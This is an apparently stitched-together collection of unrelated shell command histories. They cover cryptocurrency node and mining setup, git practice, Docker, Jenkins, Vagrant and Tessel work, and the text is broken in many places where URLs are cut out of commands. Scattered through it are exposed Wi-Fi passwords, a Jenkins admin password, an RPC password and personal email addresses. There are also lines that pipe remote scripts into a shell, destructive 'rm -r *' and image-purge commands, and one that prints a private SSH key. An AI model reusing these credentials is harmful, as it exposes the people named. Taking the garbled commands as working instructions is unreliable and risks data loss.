+litecoind -datadir=L2 stop +litecoind -datadir=L1 stop +litecoind -datadir=L2 +litecoind -datadir=L1 +litecoind -datadir=L1 getinfo +litecoind -datadir=L2 stop +litecoind -datadir=L1 stop +nano L1/litecoin.conf +clear +litecoind -datadir=L1 +litecoind -datadir=L1 getinfo +clear +LS +ls +litecoind -datadir=1 getinfo +litecoind -datadir=L1 getinfo +clear +litecoind -datadir=L1 getinfo +watch -n1 "litecoind -datadir=L1 getinfo && tail L1/testnet3/debug.log" +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 litecoinrpc rpcpassword --mergedser:changethispasswordplease@localhost:8368/ +watch -n1 "litecoind -datadir=L1 getinfo && tail L1/testnet3/debug.log" +clear +serve +go +ls +ls +ld +ls +ls +./all. +./all.bash +ls +./all.bash +go +./clean.bash +ls +./make.bash +ls +make dependencies +add-apt-repository ppa:gophers/go +apt-addrepository +apt-add-repository +ls +./all.bash +./clean.bash +./all.bash +ls +ls +git clonesyscoin/syscoin.git +apt-get install libboost-all-dev libdb-dev libdb++-dev +apt-get install build-essential automake autoconf +make -f makefile.unix +apt-get install miniupnpc libminiupnpc-dev +make -f makefile.unix +nano net.cpp +apt-get install nano +nano net.cpp +apt-get install nano +make -f makefile.unix +make -f makefile.unix -j2 +cp syscoind /usr/bin +syscoind +nano syscoin.conf +ls +syscoind +ls +nano syscoin.conf +clear +syscoind +clear +apt-get install watch +watch -n 1 "syscoind getinfo && syscoind getmininginfo && tail -n 20 debug.log" +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +nano syscoin +nano syscoin.conf +clear +syscoind +syscoind stop +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +ls +rm -r aliases/ blocks/ certificates/ chainstate/ *.log +ls +rm wallet.dat +ls +rm -r offers/ +ls +syscoind +clear +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +ls +rm -r aliases/ blocks/ certificates/ chainstate/ *.lo wallet.dat +ls +rm *.log +ls +rm -r offers/ +rm -r peers.dat +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +nano syscoin.conf +clear +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +clear +syscoind stop +ls +rm -r aliases/ blocks/ certificates/ chainstate/ offers/ *.log *.dat +ls +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +ls +rm -r aliases/ blocks/ certificates/ chainstate/ db.log debug.log offers/ *.dat +ls +nano syscoin.conf +clear +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +rm wallet.dat +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +rm -r aliases/ blocks/ certificates/ chainstate/ *.log wallet.dat offers +ls +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +syscoind stop +;s +ls +;s +ls +rm -r aliases/ blocks/ certificates/ chainstate/ *.log wallet.dat offers +sl +ls +mv bootstrap.dat.old bootstrap.dat +ls +syscoind +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +nano debug.log +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +clear +syscoind stop +tail debug.log +cat debug.log +clear +cat debug.log +watch -n 1 "syscoind getinfo && tail -n 20 debug.log" +watch -n 1 "syscoind -datadir=1 getinfo && tail -n 20 1/testnet/debug.log" +screen -r +screen -r 13440.pts-16.sschepis3 +screen -a +screen -r +killall screen +ls +apt-get install nodejs npm +apt-get update +apt-get install nodejs +apt-get install npm build-essential autotools +apt-get install npm build-essential autotool +apt-get install npm build-essential automake autoconf autogen +ls +pwd +npm config set prefix /root/npm +mkdir npm +nodejs +clear +npm install forever http-server bower component mocha grunt-clu gulp +npm install forever http-server bower component mocha grunt-cli gulp +ls +rm node_modules/ npm-debug.log tm -r +rm node_modules/ npm-debug.log tpm -r +rm node_modules/ npm-debug.log tmp -r +ls +npm install forever http-server bower component mocha grunt-cli gulp -g +clear +uname +clear +ls +mkdir dev +git clonesschepis/Swipe +git clone git@gihub.com:sschepis/Swip +git clone git@gihub.com:sschepis/Swipe +git clone git@gihub.com:sschepis/marka.git +clear +ls +git clone git@gihub.com:sschepis/Swipe +apt-get upgrade +ls +git clone git@gihub.com:sschepis/Swipe +ping github.com +git clone git@ +ls +git clone git@ +git clone git@ +git clone git@ +git clone git@ +git clone git@ +ls +./build +./build.js +npm install +./build.js +ls +ls +npm install -g serve +cler +clear +serve +apt-get install screen +screen -r +screen -R +EXIT +git status +git branch -r +git pull origin +git branch -r +git checkout dev-staging +make -f makefile.unix -j4 +cp syscoind /usr/bin +clear +syscoind -datadir=1 setgenerate true -1 +syscoind -datadir=1 getgenerate +ls +git clone +ls +./autogen.sh +ls +./config +./configure +apt-get install libcurl4-openssl-dev +./configure +ls +./compile +./missing +./missing --help +la +cat README +ls +./autogen.sh +ls +./configure +ls +make +make install +ls +minerd +ls +clear +ls +mv cpuminer/ src/ +ls +rm addr +ls +rm npm/ +rm -r npm/ +ls +rm -t tmp/ +rm -r tmp/ +clear +minerd +minerd --help +minerd -o +ls +litecoind -datadir=L1 listtranasctions +litecoind -datadir=L1 listtransactions +clear +litecoind -datadir=L1 listtranasctions +litecoind -datadir=L1 listtransactions +clear +make -f makefile.unix +make -f makefile.unix -j4 +cp syscoind /usr/bin +make stop +make start +make stop +make start +make getinfo +make start +make getinfo +syscoind -datadir=2 addnode add +syscoind -datadir=1 addnode add +make getinfo +make stop +make start +syscoind -datadir=1 setgenerate true 2 +syscoind -datadir=1 setgenerate true 4 +syscoind -datadir=1 setgenerate false +cclear +clear +make stop +make clean-sys +make start +make stop +clear +make start +clear +syscoind -datadir=1 setgenerate true 4 +syscoind -datadir=1 setgenerate true 1 +clear +nano debug.log +syscoind -datadir=1 getmininginfo +ls +syscoind -datadir=1 getmininginfo +syscoind -datadir=1 setgenerate false +clear +minerd -help +minerd -o +apt-get install git +clear +ssh-keygen -t rsa -b 4096 +ls +cat ~/.ssh/id_rsa +cat ~/.ssh/id_rsa.pub +git clonesLabs/Sia +ls +make +apt-get install go +apt-get install go-dev +apt-get install mercurial +hg clone -u release +ls +hg clone -u release +ls +./all.bash +nano debug.log +clear +watch -n 1 "litecoind getinfo && tail -n 20 debug.log" +syscoind -rescan -reindex +syscoind listtransactions +syscoind listaccounts +ls +git clonesyscoin-nodefarm +make start +clear +make getinfo +ls +make getinfo +make stop +nano Makefile +ls +make clean +clear +make start +make getinfo +syscoind -datadir=1 -testnet addnode zeus.khore.org add +syscoind -datadir=1 -testnet addnode thor.khore.org add +make getinfo +syscoind -datadir=2 -testnet addnode zeus.khore.org add +syscoind -datadir=2 -testnet addnode thor.khore.org add +syscoind -datadir=3 -testnet addnode thor.khore.org add +syscoind -datadir=3 -testnet addnode zeus.khore.org add +make getinfo +ls +ls 1 +make getinfo +litecoind stop +ls +mkdir L1 +ls +cp -R ~/.litecoin/* L1/ +ls +ls +ls +litecoind -datadir=L1 +clear +litecoind -datadir=L1 getinfo +ls +litecoind -datadir=L1 getinfo +litecoind -datadir=L1 +clear +litecoind -datadir=L1 getinfo +ls +chmod +x merged-mine-proxy +./merged-mine-proxy +clear +make start +make getinfo +killall syscoind +clear +make start +clear +ls +litecoin -datadir=L1 +litecoind -datadir=L1 +clear +./merged-mine-proxy -w 17004 -p +./merged-mine-proxy -w 17004 -pssword@ -x +./merged-mine-proxy -w 17004 -pssword@ -x +./merged-mine-proxy -w 17004 -pssword@localhost:10332/ -xst:8418/ +ifconfig +./merged-mine-proxy -w 17004 -pssword@ -x +curl +ps -e | grep sys +curl +curl +./merged-mine-proxy -w 17004 -pssword@ -x +apt-get install python-twisted +./merged-mine-proxy -w 17004 -pssword@ -x +echo "./merged-mine-proxy -w 17004 -pssword@ -x" > mm +ls +cat mm +curl +curl +chmod +x mm +mm +./mm +curl +cat mm +./merged-mine-proxy -w 17004 -pssword@ -x +syscoind -datadir=1 getinfo +syscoind -datadir=2 getinfo +syscoind -datadir=2 addnode add +syscoind -datadir=1 addnode add +syscoind -datadir=1 getinfo +syscoind -datadir=2 +clear +syscoind -datadir=2 getinfo +syscoind -datadir=1 getinfo +syscoind -datadir=2 addnode add +syscoind -datadir=1 addnode add +syscoind -datadir=2 getinfo +ls +cat README.md +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-p +ort 10332 --bitcoind-p2p-port 10333 litecoinrpc rpcpassword --mergedser:changethispasswordpleas +ort 10332 --bitcoind-p2p-port 10333 u p --merged +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +curl +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +clear +lsof -i TCP +netstat -lnp +clear +netstat -lnp +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +litecoind +litecoind getinfo +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +python run_p2pool.py --net litecoin --give-author 0 --testnet --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +litecoind stop +clear +python run_p2pool.py --net litecoin --give-author 0 --testnet --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 u p --merged +ls +cat Ma +ls +cat Makefile +syscoind -cakenet -datadir=3 +syscoind -cakenet -datadir=4 +make getinfo +make stop +make start +clear +make getinfo +syscoind -cakenet -datadir=3 addnode add +syscoind -cakenet -datadir=3 addnode add +syscoind -cakenet -datadir=4 addnode add +make getinfo +make stop +make start +clear +make getinfo +make stop +clear +make start +make getinfo +make stop +make start +make stop +make start +clear +syscoind -datadir=1 getpeerinfo +syscoind -datadir=2 getpeerinfo +syscoind -datadir=3 getpeerinfo +make stop +clear +make start +clear +make getinfo +clear +minerd -oss +clear +ls +make getinfo +watch -n 1 "litecoind -datadir=L1 getinfo && tail L1/testnet3/debug.log" +ls +./run_p2pool.py --help +./run_p2pool.py --net litecoin --testnet --give-author 0 --merged +./run_p2pool.py --net litecoin --testnet --give-author 0 --merged +./run_p2pool.py --net litecoin --testnet --give-author 0 --merged +clear +./run_p2pool.py --net litecoin --testnet --give-author 0 --merged +clear +./run_p2pool.py --net litecoin --testnet --give-author 0 --merged +;s +git clonestv/p2pool +git clonestv/p2pool +ls +ls +./configure +cat README.md +watch -n 1 "litecoind getinfo && tail -n 20 debug.log" +apt-get install screen +clear +screen -R +clearCLEAR +CLEAR +clear +ls +ls +ls +ls +rm -r .litecoin/ +ls +mkdir src +mv litecoin/ syscoin src +ls +clear +make getinfo +litecoind -testnet -datadir=L1 getaccountaddress "" +make getinfo +make stop +clear +make start +make getinfo +make generate-true +syscoind -testnet -datadir=1 setgenerate true 1 +make getinfo +syscoind -testnet -datadir=1 setgenerate true -1 +make getinfo +syscoind -testnet -datadir=1 setgenerate false +clear +syscoind -testnet -datadir=1 getinfo +syscoind -testnet -datadir=1 addnode +syscoind -testnet -datadir=1 addnode add +syscoind -testnet -datadir=1 addnode add +syscoind -testnet -datadir=2 addnode add +syscoind -testnet -datadir=2 addnode add +clear +syscoind -testnet -datadir=1 getinfo +syscoind -testnet -datadir=1 setgenerate true -1 +syscoind -testnet -datadir=1 getinfo +syscoind -testnet -datadir=1 setgenerate true -1 +clear +watch -n 1 "syscoind -datadir=1 -testnet=1 getinfo && tail 1/testnet/debug.log" +watch -n 1 "syscoind -datadir=1 -cakenet=1 getinfo && tail 1/testnet/debug.log" +watch -n 1 "syscoind -datadir=1 -cakenet=1 getinfo && tail 1/cakenet/debug.log" +ls +ls -la +ping www.bol.com.br +clear +netstat -r +netstat help +clear +mcedit teste +vi ronyvim +ls +ls -la +ls +vi ronyvim +2 +A +ls +/ +ls +ls +s +/ +vi teste +ls +ls -la +variavel="estou sem ideias" +echo =variavel +VARIAVEL="estou sem ideias" +echo $VARIAVEL +echo $VARIAVEL$VARIAVEL +echo $VARIAVEL $VARIAVEL +HOJE=$(date) +echo "hoje : $HOJE + +HOJE=$(date) +echo "hoje : $HOJE" + + + + + +hoje +clear +eexit +login + + + + + + + + + + +ls -la + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +aa +zz +:x + +unset hoje +echo $hoje +unset HOJE +echo $HOJE +ls-la +ls -la +/ +ls +ls +ls -la +ls -la +* +ls -la +ls -la +ls *la +pwd +/ +ls -la +vi primeiro +ls +ls -la +pwd +dhclient eth0 +exit +sudo apt-get install openjdk-7-jdk +sudo apt-get install java-1.8.0 +sudo apt-get install openjdk-7-jdk +sudo apt-get install openjdk-7- jdk +exit +sudo apt-get install language-pack-en +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add - +echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list +sudo apt-get update +sudo apt-get install jenkins +sudo apt-get update +sudo systemct1 start jenkins +sudo apt-get install jenkins +sudo apt-get update +sudo apt-get install default-jre +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add - +echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list +sudo apt-get update +sudo apt-get install jenkins +sudo systemctl start jenkins +sudo systemctl status jenkins +cat /var/lib/jenkins/secrets/initialAdminPassword +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +d39c04f7799b44139a6a207ba9f9dba46 +39c04f7799b44139a6a207ba9f9dba46 +apt-get install git +sudo su +java -version +sudo apt -get update +apt -get update +mkdir java_application +nano calc.java +yum update +sudo apt install yum +yum update +git --version +ls -l +clear +ls -l +git --version +git create mynewrepo +git init +clear +git init +ls -l +git add java_application +git commit -m "First Commit" +git remote +git remote -v +git status +git add helloworld.java +git add java_application/helloworld.java +git status +clear +cat /etc/resolv +ls /etc/ +clear +clear +clear +ls -la +ls rele* +uname +uname -a +clear +cat /etc/issue +rpmquery git +yum list git* +yum list git-version +git --version +rpmquery git +rpmquery git* +clear +uname -m +ifconfig -a +route -n +sudo apt- +clear +suo apt-get install git +sudo apt-get install git +clear +clear +git config --global user.name "sahil.maverick86" +git config --global user.email "sahil.maverick86@gmail.com" +ls +pwd +ls -la +ls -la +clear +mkdir gittest +su - +sudo su - +exit +type -a git +type git +git ls-tree --full-tree -r HEAD +git ls +git ls-tree +git ls-tree --name-only +git ls-tree --name-only -r HEAD +git remote -v +echo "#gittest" >> test1.txt +git init +poweroff +su - +sudo su - +git --version +echo " #gittest" >> Test.txt +echo " #gittest" >> Test.txt +echo " # gittest" >> test1.txt +git init +git add test1.txt +git commit -m "second commit thru command line" +git remote add originsifiqbalkhan/gittest.git +git push -u origin master +ls +touch newfile.md +ls +vi newfile.md +ls +ls newfile.md +vi newfile.md +git init +ls +vi newfile.md +git status +git log +echo "second file" >> shalu.txt +git init +git add shalu.txt +git commit -m "second commit thru command line" +git remote add originsifiqbalkhan/gittest.git +git push -u origin master +git pull --all +git log +git push -u origin master +git push asifiqbalkhan gittest +git fetch origin +git merge origin gittest +git pull origin master +git merge origin master +git log +git remove shalu.txt +git --help +git log +ls +git add shalu.txt +git commit -m "test2" +git remote add originsigiqbalkhan/gittest.git +git push -u origin master +git status +git log +git clonesifiqbalkhan/gittest +ls +git remote -v +ll +hg clonestewartc/cm2 +ls cm2/app/webroot +ll cm2/app/webroot +service pwd +pwd +ls -a +hg checkout recall +vi app/config/core.php +ls -l app +ls -l app/tmp +ls app/config +cp app/config/database.php.default app/config/database.php +vi app/config/database.php +hg +hg status +hg revert +hg status +hg revert app/config/core.php +hg status +rm app/config/core.php.orig +hg status +ls app +ll app +ll app/downloads/ +ll app +exit +ls +ls +hg pull -u +git -version +ruby -version +ls +sudo ls +touch .bash_prompt +vi .bash_prompt +touch .bash_profile +vi .bash_profile +touch .bashrc +vi .bashrc +touch .aliases +vi .aliases +.. +git -version +git --version +node -v +ruby -e "$(curl -fsSLsercontent.com/Homebrew/install/master/install)" +brew doctor +brew install node +node -v +npm -v +npm install -g tessel gulp grunt +mkdir git +git clone +ls +git status +npm install +mkdir tessel +tessel +tessel wifi -l +ls +ls +git config --global user.name "Derek Wheelden" +git config --global user.email +git config --global user.email "derek.wheelden@gmail.com" +git config +git config -l +git credential-osxkeychain +sudo mv git-credential-osxkeychain "$(dirname $(which git))/git-credential-osxkeychain" +git config --global credential.helper osxkeychain +git config -l +npm install -g node-inspector +npm init +tessel run blink +tessel run blink.js +tessel run blink.js +tessel run blink.js +tessel run wifi.js +tessel wifi -l +tessel wifi -l +tessel wifi -l +tessel run wifi.js +tessel wifi +tessel wifi -d +tessel run wifi.js +tessel run wifi.js +tessel run wifi.js +tessel run wifi.js +tessel run wifi.js +tessel wifi -l +tessel wifi -l +tessel run wifi.js +tessel wifi -d +tessel +tessel stop +tessel erase +tessel list +tessel blink +tessel blink +tessel wifi +tessel wifi -n BIGBEEFNCHEDDAR -p saultinkybutt +tessel wifi -n midexchange -p Vingit193 +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel wifi -n midexchange -p Vingit193 +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel wifi -n midexchange -p Vingit193 +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +tessel wifi -n midexchange -p Vingit193 +tessel wifi -n midexchange -p Vingit193 +tessel run gpio.js +tessel run gpio.js +tessel run gpio.js +say justin fuck you +say just kidding +say godzirra +say godzirra +say godzira +say godzira! +scp index.js root@ +scp index.js root@ +scp index.js root@ +scp index.js root@ +scp index.js root@ +scp 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master +git push -u origin master +git push -u origin master +git commit -m "Fresh start" +git push -u origin master +vim archives/ppgsigc/cfg/cfg.d/z_local_eprints_fields.pl +vim archives/ppgsigc/cfg/citations/eprint/default.xml +rm archives/ppgsigc/cfg/citations/eprint/default.xml +vim archives/ppgsigc/cfg/citations/eprint/default.xml +git status +git commit -a -m "Alteração Citations" +git add . +git push +git config --global push.default simple +vim archives/ppgsigc/cfg/workflows/eprint/default.xml +vim archives/ppgsigc/cfg/workflows/eprint/default.xml +bin/epadmin reload ppgsigc +vim archives/ppgsigc/cfg/lang/pt/phrases/local.xml +vim archives/ppgsigc/cfg/cfg.d/z_local_eprints_fields.pl +bin/epadmin reload ppgsigc +git status +git commit -a -m "Alterações workflow e tipo de campo múltiplo no metadata eventos" +git push +bin/epadmin erase_data ppgsigc +bin/epadmin create_user ppgsigc +mkdir tmp +vim test.pl +vim test.pl +rm test.pl +vim test.pl +./test.pl +chmod test.pl -x +./test.pl +chmod test.pl -rwx +./test.pl +chmod test.pl +rwx +chmod +x test.pl3 +chmod +x test.pl +./test.pl +chmod +rwx test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +vim test.pl +bin/import_subjects ppgsigc -xml archives/ppgsigc/cfg/subjects.xml +./test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +vim test.pl +./test.pl +vim test.pl +git status +git add . +git commit -a -m "atualização do script" +git push +rm test.pl +vim test.pl +chmod +x test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +:q +vim test.pl +./test.pl +vim test.pl +./test.pl +vim test.pl +./test.pl +vim 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+eBlue ComponeBlue ComponeBlkey>Green Component +ent +si 5 Color + +enBlue ComponenBlue ComponenBlue Componenkey> +ent +si 6 Color + +ent16 Blue ComponentBlue ComponentGreen Component +si 8 Color + +entBlue ComponentBlue Component +ent +si 9 Color + +ent +d Color + +ent +l +git clone git://github.com/altercation/vim-colors-solarized.git +l +l +l +vim .vimrc +l +git clone +mv ~/Desktop/YouCompleteMe-master.zip . +unzip YouCompleteMe-master.zip +l +rm YouCompleteMe-master +rm YouCompleteMe-master.zip +l +./install.sh +sudo ./install.sh +git submodule update --init --recursive +l +git clone +l +git ls +git log +l +reg_aladin +l +ll +l +ll +vim .viminfo +l +vim README.md +l +l +l +l +rm -r vim-config/ +sudo rm -r vim-config/ +l +l +l +rmdir serverMounts/ +l +l +rm -r syntax/ +l +l +l +rm -r indent/ +l +l +l +l +rm -r fsl/ +l +l +open spm_analysis.pdf +l +l +rm -r neuroimagingsoftware/ +l +l +l +l +l +l +l +l +rm fearMouseBehData.xls +open alz_eye_methods.docx +l +l +l +git init +git add . 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log +git tag -d oops +git log -all +git log --all +. .bash_profile +l +l +reg_f3d +vim preprocesspipeline.sh +ll +vim preprocesspipeline.sh +l +l +l +rm -r * +l +l +l +l +rm -r * +l +l +rmdir photos/ +rm -r photos/ +l +vim prename.perl +ls +ls +ls +ks +ls +ls +ls +ls +ls +fslview salz_hipp3_1_1_30m_smoothed.img +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +l +ll +mount_smbfs //sidd@HSC-TRUCHAS/EFT/Bearer%20Lab/ /Volumes/analysis/mnt/bearerlab/ +l +l +vim clonerepos.sh +git add clonerepos.sh +git add . +git status +git commit -m "updated script to update submodules" +git push origin master +git status +git add . +git add -A +git commit -m 'minor removals' +git push origin master +git log +l +l +l +l +rm -r bundles +l +git add -A +git status +git commit -m 'minor dir change' +git push origin master +l +vim README.md +yum install java-1.7.0-openjdk-devel screen -y +firewall-cmd --zone=public --permanent --add-port=25565/tcp +firewall-cmd --zone=public --permanent --add-port=25565/udp +firewall-cmd --reload +screen -S proxy +screen -S Serv1 +screen -S Serv2 +screen -r proxy +screen -r Serv1 +screen -r proxy +screen -r Serv2 +screen -r Serv1 +screen -r Serv2 +screen -r Serv1 +screen -r Serv2 +screen -r Serv1 +screen -r Serv2 +screnn -r Serv1 +screen -r Serv1 +screen -ls +screen -r proxy +screen Serv1 +screen -r Serv1 +screen -r Serv2 +ls +screen +screen -r Serv1 +screen -r Serv2 +screen -r proxy +screen -r Serv2 +screen -r proxy +screen -ls +screen -r proxy +screen -r 13357.proxy +screen -r proxy +screen -r 13357.proxy +screen -ls +screen -r 13357.proxy +screen -S Proxy +w +passwd +cat /etc/issue +w +ls +grunt +npm install +grunt +npm install -g grunt +npm install -g grunt-cli +sudo npm install -g grunt-cli +ls +vim config. +vim config.js +exit +sudo locale-gen en_US +sudo apt-get update +sudo apt-get install docker-ce +apt-cache madison docker-ce +apt-cache search docker-ce +sudo apt-get install docker-ce +sudo add-apt-repository "deb [arch=amd64]stable" +docker --version +sudo atp-get install docker +sudo apt-get install docker +docker --version +vi docker-compose.yml +rm docker-compose.yml +vi docker-compose.yml +docker-compose up +docker-compose.yml up +docker-compose up +cat docker-compose.yml +docker-compose up +docker-compose? +docker ? +--force-recreate +ls +./postinstall.sh +curl -Lse/releases/download/1.1.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose +chmod +x /usr/local/bin/docker-compose +docker-compose migrate-to-labels +docker versin +docker version +version +--version +docker --version +docker -color Black +docker-color black +docker-color red +docker -color RED +sudo apt-get remove docker docker-engine docker.io +sudo apt-get update +sudo apt-get install apt-transport-https ca-certificates curl software-properties-common +curl -fsSLsudo apt-key add - +sudo apt-key fingerprint 0EBFCD88 +sudo add-apt-repository "deb [arch=amd64]\ + $(lsb_release -cs) \ + stable" +sudo apt-get update +sudo apt-get install docker-ce +apt-cache madison docker-ce +sudo apt-get install docker-ce= +sudo apt-get install docker-ce=<18.03.0 +sudo apt-get install docker-ce=<18.03.0~ce-0~ubuntu +sudo apt-get install docker-ce=18.03.0~ce-0~ubuntu +sudo docker run hello-world +sudo apt-get update +curl -fsSLsudo apt-key add - +sudo add-apt-repository \ "deb [arch=amd64]\ $(lsb_release -cs) \ stable" +apt-get install software-properties-common +yes +sudo apt-get install software-properties-common python-software-properties +add-apt-repository ppa:git-core/ppa +sudo add-apt-repository ppa:git-core/ppa +sudo apt-get update +sudo apt-get install git +sudo add-apt-repository \ "deb [arch=amd64]\ $(lsb_release -cs) \ stable" +sudo apt-get update +sudo apt-get install docker-ce +sudo dpkg -i /path/to/package.deb +sudo docker run hello-world +sudo apt-get install docker-ce +ubuntu --version +lsb_release -a +sudo apt-get install docker-ce +apt-get update +sudo apt-get update +apt-get install docker-ce +sudo apt-get install docker-ce +apt-cache madison docker-ce +sudo apt-get install docker-ce=18.03.0~ce-0~ubuntu +sudo apt-get install docker-ce=18.04.0~ce-0~ubuntu +sudo apt-get install docker-ce +Vagrant.configure("2") do |config| +end +vagrant box remove +sudo vagrant box remove +sudo apt-get install vagrant +vagrent -version +vagrant -version +sudo apt-get install docker-ce +cat +cat Vagrantfile +Vagrant.configure("2") do |config|' +Vagrant.configure(2) do |config| +docker system prune +docker system prune -a +docker images -a +docker rmi $(docker images -a -q) +docker volume ls +sudo apt-get install docker.io +sudo ln -sf /usr/bin/docker.io /usr/local/bin/docker +sudo apt-get install docker.io +sudo apt-get install apt-transport-https ca-certificates curl software-properties-common +curl -fsSLsudo apt-key add - +sudo add-apt-repository "deb [arch=amd64]stable" +sudo apt-get update +apt-cache search docker-ce +sudo apt-get install docker-ce +vagrant up +vagrant init +vagrant up +vagrant ssh +ls -la +ls +ls -la +ls +vim Vagrant +vagrant up +exit +ll +./startup.sh +sudo vi tomcat-users.xml +ll +sudo vi tomcat-users.cml +sudo vi tomcat-users.xml +curl wgetip.com +sudo vi tomcat-users.xml +cat tomcat-users.xml +./shutdown.sh +./startup.sh +ll +sudo vi context.xml +ll +sudo vi initialAdminPassword +sudo apt-get install software-properties-common +sudo apt-add-repository ppa:ansible/ansible +sudo apt-get update +curl wgerip.com +curl wgetip.com +ansible --version +apt install ansible +ansible --version +ls +ssh localhost +ssh key-gen +key-gen ssh +ssh key-gen +ssh-keygen +cat /etc/ansible +cat /etc/ansible/hosts +cat id_rsa.pub >> authorized_keys +cat ~/.ssh/id_rsa.pub >> authorized_keys +ssh localhost +cat ~/.ssh/id_rsa.pub +cat ~/.ssh/authorized_keys +cat ~/.ssh/id_rsa.pub +cat ~/.ssh/authorized_keys +cat ~/.ssh/id_rsa.pub >> authorized_keys +cat ~/.ssh/authorized_keys +ssh localhost +ssh-keygen +cat ~/.ssh/id_rsa.pub >> authorized_keys +ssh localhost +ssh-keygen +cat ~/.ssh/id_rsa.pub >> authorized_keys +ssh localhost +sudo ssh localhost +docker +apt update +apt install docker.io +docker version +docker search ubuntu +docker pull ubuntu +docker images +docker pull ubuntu16.06 +docker pull ubuntu16.04 +docker pull ubuntu:16.04 +docker images +ls -lart /var/lib/docker +df -h +docker rmi 'docker imgaes | grep -v REPO | awk '{print $3}'' +docker rmi `docker images | grep -v REPO | awk '{print $3}'` +docker images +docker pull ubuntu +ls -lart /var/lib/docker +docker run -it ubuntu bash +docker ps -a +docker rmi 005276e07340 +docker rm 005276e07340 +docker ps +docker ps -a +docker ps =a +docker ps -a +docker logs d069a1338f25 +docker run -d -e MYSQL_ROOT_PASSWORD=password mysql"5.7 +docker run -d -e MYSQL_ROOT_PASSWORD=password mysql:5.7 +ps -ef | grep mysql +docker ps -a +docker exec -it bcce105b35c0 bash +docker kill bcce105b35c0 +docker start bcce105b35c0 +docker stop bcce105b35c0 +docker runbcce105b35c0 +docker run bcce105b35c0 +docker rm bcce105b35c0 +docker run -d -e MYSQL_ROOT_PASSWORD=password -p 3306:3306 mysql:5.7 +netstat -ntlp +docker ps +docker -ntlp +487 docker run -d -p 8080:8080 --name jenkins jenkins +docker run -d -p 8080:8080 --name jenkins:jenkins +docker run -d -p 8080:8080 --name jenkins jenkins +docker images +docker commit junior1234/images +docker images +docker commit 5772a66b5784 junior1234/images +docker run 5772a66b5784 +docker commit 5772a66b5784 junior1234/images +docker ps -a +docker commit 5a9ba717c7a5 junior1234/images +docker push junior1234/images +docker login +docker push junior1234/images +docker inspect 5a9ba717c7a5 +docker ps -a +docker exec -it 1fe1ef28ae60 ifconfig +docker ps -a +docker exec -it 1fe1ef28ae60 ifconfig +docker run 1fe1ef28ae60 +docker run mysql:5.7 +docker run -it ubuntu +docker ps -a +docker inspect 279a5e3c3cea +docker inspect 279a5e3c3cea | less +clear +curl wgetip.com +curl wgerip.com +curl wgetip.lcom +curl wgetip.com +vi pedro buglione vim +vi pedro buglione +vi pedroluizbuglionevim +vi pedroluizbuglione +vi pedroluizbuglionevim +vi pedroluizVIM +vi pedroluiz +vi pedroluizVIM +vi pedro buglione +cat pedro buglione +less pedro buglione +nano pedroluiz nano +nano pedroluiz +df +chmod +x primeiro +ls +ls +ld +ls +ls -la +cat index.html +cat package.json +ls +ls +type nul > App.js +ls +rm -rf type nul > App.js^C +ls +ls +cat google-cloud-sdk +ls +ls +ls +ls +cat App.js +ls +ls +ls +mkdir REACTJS +l +clear +git init +git clone +ls +ls +ls -l +cat index.html +node -v +npm -v +npm install +npm run +npm start +cat 